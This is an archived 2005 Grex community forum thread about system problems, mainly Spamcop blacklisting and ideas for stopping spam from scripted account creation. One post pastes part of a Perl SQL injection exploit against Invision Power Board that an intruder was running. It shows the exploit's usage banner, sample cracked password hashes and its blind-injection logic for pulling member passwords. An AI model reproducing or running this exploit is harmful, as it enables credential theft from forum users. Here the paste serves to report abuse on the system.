|
Grex > Helpers > #147: Grex System Problems - Winter 2005/06 | |
|
| Author |
Message |
| 25 new of 260 responses total. |
cross
|
|
response 36 of 260:
| 
Dec 28 19:15 UTC 2005 |
This response has been erased.
|
tod
|
|
response 37 of 260:
|
Dec 28 19:30 UTC 2005 |
warning: libc.so.38.2: minor version >= 3 expected, using it anyway
PicoSpan T3.3a; designed by Marcus Watts
copyright 1984 NETI; licensed by Unicon Inc.
|
gull
|
|
response 38 of 260:
|
Dec 28 20:38 UTC 2005 |
Re resp:35: Being listed on Spamcop is not, in itself, enough to get
Spamassassin to reject mail in its default configuration. Spamassassin
works on a "point" system. Various signs of spam are worth certain
numbers of points. If the score exceeds a user-configurable threshold,
the mail is tagged as spam or rejected, depending on the configuration.
Being listed in bl.spamcop.net is only worth 1.8 points towards a
default spam threshold of 5.
Most likely, some clueless mail admin is blocking all mail from hosts
in Spamcop's blacklist. There are blacklists that I feel are accurate
enough to use that way, but bl.spamcop.net definitely isn't one of
them.
|
tod
|
|
response 39 of 260:
|
Dec 29 07:00 UTC 2005 |
!help
Welcome to Grex's help archives!
Please mail staff with additions, corrections, or if you need help!
Valerie Mates, valerie@cyberspace.org. Last update 6/5/97
Available documents are:
0. The new, excellent, Grex FAQ. Highly recommended!
1. An Introduction to Grex ("Take Me To Your Modem")
2. Frequently Asked Questions (more useful to non-Grexers)
3. An Introduction To The Picospan Conferencing ("BBS") System.
4. The Grex Declaration Of Principles
5. Who pays for Grex? Can I help? Does this cost money?
6. Phone list
7. Article about Grex that was in the People's Food Co-op Newsletter
8. Choose this option to get >>>help from a real live person<<<
9. Run the menu system.
A. Run Lynx.
B. Go to the conferences ("BBS").
C. Change settings on your account (password, name, shell, .plan file, etc)
D. Frequently Asked Questions about Grex's Party program
E. Frequently Asked Questions about Web Pages on Grex
Choose a number (or letter), or q to quit: 6
Last update: 4/25/2001 by scott@cyberspace.org
The phone numbers for Grex are:
phone number device modem type max. speed
------------------------------------------------
+1 734 761 3000 Groovy GVC 14.4 14400 bps
+1 734 761 5041 Groovy GVC 14.4 14400 bps
+1 734 761 3411 Groovy GVC 14.4 14400 bps
+1 734 761 3451 Groovy GVC 14.4 14400 bps
+1 734 761 3554 Groovy GVC 14.4 14400 bps
+1 734 761 3596 Groovy GVC 14.4 14400 bps
+1 734 761 2517 Groovy GVC 14.4 14400 bps
In normal operation, these numbers trunk hunt, so dialing (734) 761-3000
will give you the first available line out of these seven. All of the
modems connect to a terminal server which makes an 8-bit telnet connection
to Grex.
Press Enter to continue...
|
keesan
|
|
response 40 of 260:
|
Dec 29 16:52 UTC 2005 |
Tod, can you volunteer to write up a replacement page for some staff member
to post?
We are still blacklisted by spamcop.
Your ip number was found on spamcopgl.gis.net RBL database.
Freeshell is apparently using this same database by itself:
blocked according spamcop.net. See http://spamcop.net/bl.
It is at least three days now - if we ask nicely will spamcop take us off the
list?
|
tod
|
|
response 41 of 260:
|
Dec 29 16:55 UTC 2005 |
re #40
I don't know the numbers but I'd be glad to write a revision.
|
keesan
|
|
response 42 of 260:
|
Dec 29 17:00 UTC 2005 |
It is possible to get on the spamcop whitelist. Spamex (provides disposable
email addresses) just managed to do this. They are also supposed to take us
off the list when the spamming stops. Did it stop? Do they report to us
where exactly the spam is coming from?
|
mary
|
|
response 43 of 260:
|
Dec 29 19:06 UTC 2005 |
Maybe before we try to get off any spam lists we should make sure
we don't deserve to be blocked. Grex has a problem with a very few
users abusing our open mail. Staff knows about it and is trying to
fix it. It's not fixed yet.
|
gull
|
|
response 44 of 260:
|
Dec 29 19:41 UTC 2005 |
It's listed because Spamcop users have reported it as a source of spam
ten times in the last week. Unfortunately they don't show you what got
you listed, so it's a bit hard to say for sure who's causing the
problem.
|
bhoward
|
|
response 45 of 260:
|
Dec 30 01:31 UTC 2005 |
Dollars to donuts we were listed due to a recent spate of accounts
created from users on AOL's networks that sign-in and blast a ton
of spam before getting shut down.
These spammers seem to have automated the account creation process
and installation of their spamming scripts which makes me wonder
if it is time to implement some kind of CAPTCHA to protect against
scripted account creation and maybe also institute some sort of
fixed delay before allowing access to mail on grex.
I don't think we have the staffing to require formal validation
like we do for membership but even a simple requirement that an
account be older than say 10 days before it is allowed to send mail
might be enough of a barrier to slow the hit-and-run spammers.
Alternatively, maybe someone out there has implemented per-user
outbound mail quotas for exim (though I didn't find anything the
last time I checked).
|
cross
|
|
response 46 of 260:
|
Dec 30 01:40 UTC 2005 |
This response has been erased.
|
nharmon
|
|
response 47 of 260:
|
Dec 30 02:05 UTC 2005 |
Here is a thought... ASCII art. Generate some word in ASCII art that the
person creating the account has to recognize in order to complete
his/her registration. A text-based version of what yahoo does. :)
|
bhoward
|
|
response 48 of 260:
|
Dec 30 02:19 UTC 2005 |
Re#46 Personally, I want to preserve the ability for non-members to
send mail. I just would like to raise the barrier to make it difficult
for automated account creation.
Having new users placed into a trial group until they ran some sort
of CAPTCHA requesting access and having that access granted after a
48 hour delay would probably do the job. Adding a per-day outbound
mail quota on top of that would pretty much kill the problem without
unduly restricting new members.
|
aruba
|
|
response 49 of 260:
|
Dec 30 04:19 UTC 2005 |
Re #47: That's a cute idea!
|
bhoward
|
|
response 50 of 260:
|
Dec 30 05:00 UTC 2005 |
An ascii-art / figlet kine CAPTCHA somehow seems very appropriate
for grex :-)
|
keesan
|
|
response 51 of 260:
|
Dec 30 05:33 UTC 2005 |
What size quota? I just sent out (not from grex this time because I don't
want anyone replying here because it is unreliable) the same little mail to
about 40 people (happy new year). How many copies do spammers send?
|
tsty
|
|
response 52 of 260:
|
Dec 30 06:24 UTC 2005 |
39 ....
|
gull
|
|
response 53 of 260:
|
Dec 30 07:29 UTC 2005 |
Exim 4.x has a very sophisticated ACL mechanism. I would bet someone
has implemented outbound quotas in it at some point.
The ASCII CAPTCHA idea is a pretty good one, too. :)
|
bhoward
|
|
response 54 of 260:
|
Dec 30 08:39 UTC 2005 |
Sindi, what often happens is that someone will come in from AOL,
create a batch of accounts, then set each one going mass mailing
anywhere from a few hundred to several 1000 different addresses.
I believe on a few occasions, Steve has had to clean up spam
loads on the order of 10's of thousands.
I'm sure you are right, David. I just don't know much about exim
yet (I run postfix for my family ISP)...but I expect I will be
learning a bit more as I wade into this.
|
rcurl
|
|
response 55 of 260:
|
Dec 30 16:29 UTC 2005 |
What do spammers give typically as a *return* address when they spam from
Grex?
|
aruba
|
|
response 56 of 260:
|
Dec 30 17:57 UTC 2005 |
I thik the return address on most spam is a fake email address, or a stolen
one. Spammers expect you to respond by going to their website, not by
replying to their email.
|
gull
|
|
response 57 of 260:
|
Dec 30 20:10 UTC 2005 |
Re resp:54: The Exim email list is extremely helpful. There's also a
package of sample configurations that has a lot of useful stuff in it.
|
keesan
|
|
response 58 of 260:
|
Dec 30 20:16 UTC 2005 |
Can you limit outgoing mails to 25 or 50 addresses per mailing, and 100 mails
per day, or 1MB per day? Or even limit to 10 and 25, with exceptions for
members?
|
tod
|
|
response 59 of 260:
|
Dec 30 21:51 UTC 2005 |
SQL exploit hackers in action on Grex....
mirror pf 62.33.88.166 4:13PM 4 perl ipb.pl http://forum.unix.kg
/ 4
!more ~mirror/ipb.pl
#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .=chr($i);;
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
Then under the "Pass nik" directory are a file for ID's and another...
NICE...NOT!
|
keesan
|
|
response 60 of 260:
|
Dec 30 22:45 UTC 2005 |
Please translate the previous response.
|